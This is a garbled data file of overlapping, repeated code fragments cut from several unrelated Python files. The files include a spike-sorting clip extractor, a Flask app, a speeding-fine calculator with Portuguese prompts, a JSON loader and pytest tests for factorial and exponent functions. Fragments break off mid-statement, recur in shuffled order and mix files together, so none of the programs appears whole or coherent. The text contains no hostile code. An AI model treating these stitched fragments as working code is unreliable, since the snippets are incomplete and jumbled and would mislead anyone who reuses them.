\"\"\"", "timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False):", "cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return", "times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L))", "def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters ---------- timeseries :", "TimeseriesChunkReader # import the C++ code # we no longer use cppimport #", "extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips", "F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size", "Path of clips mda file (MxTxL). T=clip_size clip_size : int (Optional) clip size,", ": int (Optional) clip size, aka snippet size, aka number of timepoints in", "mda file (MxTxL). T=clip_size clip_size : int (Optional) clip size, aka snippet size,", "(Optional) clip size, aka snippet size, aka number of timepoints in a single", "def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a", "import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from common import TimeseriesChunkReader #", "True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return None return extract_clips_helper._clips extract_clips.name=processor_name extract_clips.version=processor_version", "events. Second row are timestamps. clips_out : OUTPUT Path of clips mda file", "import numpy as np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda from", "---------- timeseries : INPUT Path of timeseries mda file (MxN) from which to", "basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike", "file (MxTxL). T=clip_size clip_size : int (Optional) clip size, aka snippet size, aka", "in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries)", "# cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC", "clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def", "cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3", "mda file (MxN) from which to draw the event clips (snippets) firings :", "L is the number of events. Second row are timestamps. clips_out : OUTPUT", "timestamps. clips_out : OUTPUT Path of clips mda file (MxTxL). T=clip_size clip_size :", "T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2,", "import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall -shared", "-I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding", "and L is the number of events. Second row are timestamps. clips_out :", "T=clip_size clip_size : int (Optional) clip size, aka snippet size, aka number of", "writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0]", ": INPUT Path of timeseries mda file (MxN) from which to draw the", "Second row are timestamps. clips_out : OUTPUT Path of clips mda file (MxTxL).", "no longer use cppimport # import cppimport # cpp=cppimport.imp('basic_cpp') # Do this first:", "<filename>basic/p_extract_clips.py<gh_stars>1-10 import numpy as np import sys,os parent_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(parent_path) from mlpy import writemda64,writemda32,readmda,DiskReadMda", "= X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return", "processor_name='pyms.extract_clips' processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters ----------", "(snippets) firings : INPUT Path of firings mda file (RxL) where R>=2 and", "pybind11 --includes` basic_cpp.cpp -o basic_cpp`python3-config --extension-suffix` -I../mlpy import basic_cpp as cpp processor_name='pyms.extract_clips' processor_version='0.1'", "Extract clips corresponding to spike events Parameters ---------- timeseries : INPUT Path of", "def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if", "return writemda32(clips,clips_out) def extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info):", "aka number of timepoints in a single clip \"\"\" F=readmda(firings) times=F[1,:] clips=extract_clips_helper(timeseries=timeseries,times=times,clip_size=clip_size) return", "processor_version='0.1' def extract_clips(*,timeseries,firings,clips_out,clip_size=100): \"\"\" Extract clips corresponding to spike events Parameters ---------- timeseries", "extract_clips_helper(*,timeseries,times,clip_size=100,verbose=False): X=DiskReadMda(timeseries) M,N = X.N1(),X.N2() L=times.size T=clip_size extract_clips_helper._clips=np.zeros((M,T,L)) def _kernel(chunk,info): inds=np.where((info.t1<=times)&(times<=info.t2))[0] times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F');", "clips (snippets) firings : INPUT Path of firings mda file (RxL) where R>=2", "times0=times[inds]-info.t1+info.t1a clips0=np.zeros((M,clip_size,len(inds)),dtype=np.float32,order='F'); cpp.extract_clips(clips0,chunk,times0,clip_size) extract_clips_helper._clips[:,:,inds]=clips0 return True TCR=TimeseriesChunkReader(chunk_size_mb=100, overlap_size=clip_size*2, verbose=verbose) if not TCR.run(timeseries,_kernel): return", "from which to draw the event clips (snippets) firings : INPUT Path of", "(MxTxL). T=clip_size clip_size : int (Optional) clip size, aka snippet size, aka number", "cppimport # cpp=cppimport.imp('basic_cpp') # Do this first: # g++ -O3 -Wall -shared -std=c++11", "extract_clips.name=processor_name extract_clips.version=processor_version def test_extract_clips(): M,T,L,N = 5,100,100,1000 X=np.random.rand(M,N).astype(np.float32) writemda32(X,'tmp.mda') F=np.zeros((2,L)) F[1,:]=200+np.random.randint(N-400,size=(1,L)) writemda64(F,'tmp2.mda') ret=extract_clips(timeseries='tmp.mda',firings='tmp2.mda',clips_out='tmp3.mda',clip_size=T)", "clips corresponding to spike events Parameters ---------- timeseries : INPUT Path of timeseries", "this first: # g++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes`", "firings : INPUT Path of firings mda file (RxL) where R>=2 and L" ]
[ "import render_template from webapp import app from webapp.route import bp from webapp.database import", "webapp.route import bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index():", "render_template from webapp import app from webapp.route import bp from webapp.database import setup", "from webapp import app from webapp.route import bp from webapp.database import setup #", "app from webapp.route import bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/')", "import bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return", "webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404) def", "import app from webapp.route import bp from webapp.database import setup # app.register_blueprint(bp) setup()", "from webapp.route import bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def", "# app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404) def pagenotfound(error): return render_template('error.html')", "<filename>webapp/project.py from flask import render_template from webapp import app from webapp.route import bp", "from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404)", "from flask import render_template from webapp import app from webapp.route import bp from", "bp from webapp.database import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html')", "setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404) def pagenotfound(error): return", "webapp import app from webapp.route import bp from webapp.database import setup # app.register_blueprint(bp)", "flask import render_template from webapp import app from webapp.route import bp from webapp.database", "import setup # app.register_blueprint(bp) setup() @app.route('/') def index(): return render_template('index.html') @app.errorhandler(404) def pagenotfound(error):" ]
[ "vel = int(input('Digite a velocidade que o carro está: ')) if vel >", "if vel > 80: print('Você foi multado em {} reais'.format((vel - 80) *", "')) if vel > 80: print('Você foi multado em {} reais'.format((vel - 80)", "o carro está: ')) if vel > 80: print('Você foi multado em {}", "que o carro está: ')) if vel > 80: print('Você foi multado em", "a velocidade que o carro está: ')) if vel > 80: print('Você foi", "carro está: ')) if vel > 80: print('Você foi multado em {} reais'.format((vel", "velocidade que o carro está: ')) if vel > 80: print('Você foi multado", "está: ')) if vel > 80: print('Você foi multado em {} reais'.format((vel -", "= int(input('Digite a velocidade que o carro está: ')) if vel > 80:", "vel > 80: print('Você foi multado em {} reais'.format((vel - 80) * 7))", "int(input('Digite a velocidade que o carro está: ')) if vel > 80: print('Você" ]
[ "json def get_channels(): with open('bin/channels.json', 'r') as f: parsed = json.loads(f.read()) f.close() return", "<filename>resource/globals.py import json def get_channels(): with open('bin/channels.json', 'r') as f: parsed = json.loads(f.read())", "import json def get_channels(): with open('bin/channels.json', 'r') as f: parsed = json.loads(f.read()) f.close()", "def get_channels(): with open('bin/channels.json', 'r') as f: parsed = json.loads(f.read()) f.close() return parsed" ]
[ "and (val_a + delta) >= val_b return (not (val_a + delta) < val_b)", "val_b return (not (val_a + delta) < val_b) and (not (val_b + delta)", "(val_a + delta) >= val_b return (not (val_a + delta) < val_b) and", "fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f,", "assert ([1] + [a for a in [1] for b in range(1, num", "{0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1):", "fn1, base, num in [(f, b, n) for (b, n) in bound_values(*[(2.0, 20.0),", "teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin():", "9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a", "# -*- coding: utf-8 -*- '''Test cases for Classic module.'''from __future__ import (absolute_import,", "== fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f, b, n) for", "fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001 * (base ** num))", "{0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num", "print_function, unicode_literals) import pytest from future.builtins import (ascii, filter, hex, map, oct, zip,", "** num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001 *", "[1] for b in range(1, num + 1) for a in [a *", "delta = abs(tolerance) #return (val_a - delta) <= val_b and (val_a + delta)", "in bound_values(*[(0, 18)]) # for n in [0, 9, 18] for f in", "= abs(tolerance) #return (val_a - delta) <= val_b and (val_a + delta) >=", "+ 1):]) for ndx, axis in enumerate(axis_bounds) for el in axis] return set(bound_vals)", "max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m + max_m) //", "object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) -", "abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a", "set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function):", "in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in [1] for b", "{{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b)", "for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert", "import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import (ascii, filter, hex,", "# (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a - delta)", "+ 1, (min_m + max_m) // 2, max_m - 1, max_m) for (min_m,", "print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__))", "print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown", "tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance)", "axis in enumerate(axis_bounds) for el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module:", "in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a) +", "# for b in [2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0]", "[3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) ==", "(min_m + max_m) // 2, max_m - 1, max_m) for (min_m, max_m) in", ">= abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <= val_b and (val_a", "20.0] for n in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert", "[a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f,", "* b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f, b,", "for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m +", "classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base,", "[2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0] for f in [classic.expt_i,", "bound_values(*[(0, 18)]) # for n in [0, 9, 18] for f in [classic.fact_i,", "== fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001 * (base **", "(3.0, 10.0)]) # for b in [2.0, 11.0, 20.0] for n in [3.0,", "= [(min_m + max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds =", "{0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n) for (n,) in", "module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture", "for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins", "division, print_function, unicode_literals) import pytest from future.builtins import (ascii, filter, hex, map, oct,", "def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin)", "#assert (base ** num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base, num),", "test_expt(fixture_func1): for fn1, base, num in [(f, b, n) for (b, n) in", "f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert in_epsilon(base", "pytest from future.builtins import (ascii, filter, hex, map, oct, zip, object, range) from", "__future__ import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import (ascii, filter,", "from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <=", "ndx, axis in enumerate(axis_bounds) for el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup", "val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for (min_m, max_m)", "num in [(f, n) for (n,) in bound_values(*[(0, 18)]) # for n in", "in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m + max_m) // 2,", "def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup", "= [(min_m, min_m + 1, (min_m + max_m) // 2, max_m - 1,", "[(min_m + max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m,", "num) == fn1(base, num) assert in_epsilon(base ** num, fn1(base, num), 0.001 * (base", "axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__))", "function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n) for", "for ndx, axis in enumerate(axis_bounds) for el in axis] return set(bound_vals) def setup_module(module):", "def test_fact(fixture_func1): for fn1, num in [(f, n) for (n,) in bound_values(*[(0, 18)])", "#return (val_a - delta) <= val_b and (val_a + delta) >= val_b return", "+ delta) < val_b) and (not (val_b + delta) < val_a) def bound_values(*min_max_groups):", "n in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base **", ">= val_b return (not (val_a + delta) < val_b) and (not (val_b +", "module.'''from __future__ import (absolute_import, division, print_function, unicode_literals) import pytest from future.builtins import (ascii,", "1, (min_m + max_m) // 2, max_m - 1, max_m) for (min_m, max_m)", "val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a) + tolerance)", "in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base ** num)", "val_b and (val_a + delta) >= val_b return (not (val_a + delta) <", "([1] + [a for a in [1] for b in range(1, num +", "for n in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1]", "fn1, num in [(f, n) for (n,) in bound_values(*[(0, 18)]) # for n", "- tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta =", "axis_bounds = [(min_m, min_m + 1, (min_m + max_m) // 2, max_m -", "utf-8 -*- '''Test cases for Classic module.'''from __future__ import (absolute_import, division, print_function, unicode_literals)", "a in [1] for b in range(1, num + 1) for a in", "in enumerate(axis_bounds) for el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__))", "and # (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a -", "1, max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] +", "{0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def", "classic.fact_lp]]: assert ([1] + [a for a in [1] for b in range(1,", "def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a)", "import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and", "(b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0, 11.0,", "range(1, num + 1) for a in [a * b]])[-1] == fn1(num) def", "< val_a) def bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for (min_m,", "in [classic.expt_i, classic.expt_lp]]: #assert (base ** num) == fn1(base, num) assert in_epsilon(base **", "n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0, 11.0, 20.0]", "f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in [1] for", "zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return ((abs(val_a)", "coding: utf-8 -*- '''Test cases for Classic module.'''from __future__ import (absolute_import, division, print_function,", "(val_a + delta) < val_b) and (not (val_b + delta) < val_a) def", "10.0)]) # for b in [2.0, 11.0, 20.0] for n in [3.0, 6.0,", "<= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return", "- 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el]", "and (not (val_b + delta) < val_a) def bound_values(*min_max_groups): avg_vals = [(min_m +", "(abs(val_a) + tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <=", "[(min_m, min_m + 1, (min_m + max_m) // 2, max_m - 1, max_m)", "oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic def in_epsilon(val_a, val_b, tolerance=0.001): #return", "setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function:", "max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx", "teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def setup_function(function): print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function:", "delta) >= val_b return (not (val_a + delta) < val_b) and (not (val_b", "[a for a in [1] for b in range(1, num + 1) for", "# for n in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert", "for b in range(1, num + 1) for a in [a * b]])[-1]", "function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for", "2, max_m - 1, max_m) for (min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx]", "for b in [2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0] for", "bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in [2.0, 11.0, 20.0] for n", "+ [el] + avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for el", "max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m +", "+ [a for a in [1] for b in range(1, num + 1)", "2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m + 1, (min_m", "(min_m, max_m) in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):])", "[(f, b, n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for", "((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >= abs(val_b)) delta", "future.builtins import (ascii, filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import", "tolerance=0.001): #return ((abs(val_a) - tolerance) <= abs(val_b) and # (abs(val_a) + tolerance) >=", "enumerate(axis_bounds) for el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def", "{0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__))", "unicode_literals) import pytest from future.builtins import (ascii, filter, hex, map, oct, zip, object,", "return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown module: {0}\".format(module.__name__)) def", "for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a for a in [1]", "el in axis] return set(bound_vals) def setup_module(module): print(\"\\nSetup module: {0}\".format(module.__name__)) def teardown_module(module): print(\"\\nTeardown", "def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def", "in [2.0, 11.0, 20.0] for n in [3.0, 6.0, 10.0] for f in", "a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num", "print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n)", "11.0, 20.0] for n in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]:", "function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1):", "(val_a - delta) <= val_b and (val_a + delta) >= val_b return (not", "avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for el in axis] return", "(Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1,", "18)]) # for n in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]:", "+ avg_vals[(ndx + 1):]) for ndx, axis in enumerate(axis_bounds) for el in axis]", "@pytest.fixture def fixture_func1(request): print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__))", "request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in [(f, n) for (n,) in bound_values(*[(0,", "in [(f, b, n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) #", "return (not (val_a + delta) < val_b) and (not (val_b + delta) <", "bound_values(*min_max_groups): avg_vals = [(min_m + max_m) // 2 for (min_m, max_m) in min_max_groups]", "def test_expt(fixture_func1): for fn1, base, num in [(f, b, n) for (b, n)", "n) for (n,) in bound_values(*[(0, 18)]) # for n in [0, 9, 18]", "n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b in", "1) for a in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1,", "+ delta) >= val_b return (not (val_a + delta) < val_b) and (not", "-*- coding: utf-8 -*- '''Test cases for Classic module.'''from __future__ import (absolute_import, division,", "import (ascii, filter, hex, map, oct, zip, object, range) from {{cookiecutter.parent}}.{{cookiecutter.project}} import classic", "- delta) <= val_b and (val_a + delta) >= val_b return (not (val_a", "print(\"Setup function: {0}\".format(function.__name__)) def teardown_function(function): print(\"\\nTeardown function: {0}\".format(function.__name__)) @pytest.fixture def fixture_func1(request): print(\"Setup function", "def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1): for fn1, num in", "(n,) in bound_values(*[(0, 18)]) # for n in [0, 9, 18] for f", "base, num in [(f, b, n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0,", "(not (val_a + delta) < val_b) and (not (val_b + delta) < val_a)", "for n in [3.0, 6.0, 10.0] for f in [classic.expt_i, classic.expt_lp]]: #assert (base", "+ tolerance) >= abs(val_b)) delta = abs(tolerance) #return (val_a - delta) <= val_b", "+ max_m) // 2 for (min_m, max_m) in min_max_groups] axis_bounds = [(min_m, min_m", "in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert ([1] + [a", "in min_max_groups] bound_vals = [tuple(avg_vals[:ndx] + [el] + avg_vals[(ndx + 1):]) for ndx,", "in [a * b]])[-1] == fn1(num) def test_expt(fixture_func1): for fn1, base, num in", "print(\"Setup function (Fixture1): {0}\".format(request.function.__name__)) def fin(): print(\"\\nTeardown function (Fixture1): {0}\".format(request.function.__name__)) request.addfinalizer(fin) def test_fact(fixture_func1):", "import pytest from future.builtins import (ascii, filter, hex, map, oct, zip, object, range)", "fn1(num) def test_expt(fixture_func1): for fn1, base, num in [(f, b, n) for (b,", "b, n) for (b, n) in bound_values(*[(2.0, 20.0), (3.0, 10.0)]) # for b", "for fn1, num in [(f, n) for (n,) in bound_values(*[(0, 18)]) # for", "n in [0, 9, 18] for f in [classic.fact_i, classic.fact_lp]]: assert 